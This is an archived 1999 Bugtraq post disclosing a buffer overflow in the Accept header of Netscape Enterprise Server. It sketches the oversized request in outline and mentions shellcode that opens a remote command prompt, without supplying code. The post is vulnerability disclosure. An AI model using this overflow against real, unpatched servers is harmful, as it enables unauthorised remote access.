Bugtraq mailing list archives

Enterprise Overflow

From: neophyte () BEAVUH ORG (Daniel Kerr)
Date: Sat, 11 Sep 1999 22:17:55 -0400


Posted on dark spyrit's behalf...

Our apologies for holding back on this info, we just had a few things to
sort out first.

As is the norm for an ISS advisory, retrieving any useful information is
completely out of the question - after all, the market value of a product
is at stake.
Heaven forbid that the xforce would give the security community real
information, without asking anything in return. I dread the day.

So rather than being duped into downloading the scanner, and still gain no
insight on the vulnerability itself, we at beavuh will share what we know.

An overflow exists in the "Accept" header field, which can be exploited
with any of the common request methods.
e.g:

GET / HTTP/1.0
Accept: (a page or so of data)

The fact that this overflow also affects other request methods rather than
just "GET" leads me to believe that this may not be the same hole the
xforce mentioned.

Hopefully we will receive a reply offering more detailed information, or
at least acknowledge that this is/isn't the same hole.

Be sure to check out the new issue of Phrack, which includes my article on
Win32 overflows.
Everything from location using disassembly techniques, to exploiting the
weakness, through to adding your own code to the binary executable(s) to
prevent the vulnerabilities.
The shellcode spawns a full-blown command prompt on any port you specify,
without relying on downloading external files - which seems to be the
trend with win32 remote exploits.

We may release demonstration code for Enterprise if the need arises.

dark spyrit / Barnaby Jack <dspyrit () beavuh org>

beavuh - bend over and pray.
http://www.beavuh.org

Current thread:

Re: Root shell vixie cron exploit, (continued)
- - - Re: Root shell vixie cron exploit Raymond Dijkxhoorn (Sep 07)
  - Re: Root shell vixie cron exploit Christos Zoulas (Sep 03)
  - [security-officer () FreeBSD ORG: FreeBSD-SA-99:01: BSD File Flags and Programming Techniques] Patrick Oonk (Sep 03)
  - Re: Root shell vixie cron exploit Valentin Nechayev (Sep 04)
  - gftp Oscar Haeger (Sep 05)
    - Re: gftp - ms ftp debug mode Bencsath Boldizsar (Sep 08)
    - fixing all buffer overflows --- random magin numbers Dr. Joel M. Hoffman (Sep 11)
    - Re: fixing all buffer overflows --- random magin numbers Peter van Dijk (Sep 12)
    - Re: fixing all buffer overflows --- random magin numbers Eric Hutchinson (Sep 12)
    - Re: fixing all buffer overflows --- random magin numbers Daniel W. Dulitz x108 (Sep 13)
    - Enterprise Overflow Daniel Kerr (Sep 11)
    - Re: gftp - ms ftp debug mode Valentin (Sep 12)
    - Re: gftp - ms ftp debug mode Max Vision (Sep 12)
    - Linux 2.2.12 mini-audit Solar Designer (Sep 13)
    - Vulnerability in dtaction Job de Haas (Sep 13)
    - Many kind of POP3/SMTP server softwares for Windows have buffer overflow bug UNYUN (Sep 12)
    - Accept overflow on Netscape Enterprise Server 3.6 SP2 Nobuo Miwa (Sep 12)
  - COM and Windows 2000 Mnemonix (Sep 05)
    - Re: COM and Windows 2000 thomasz () HOSTMASTER ORG (Sep 12)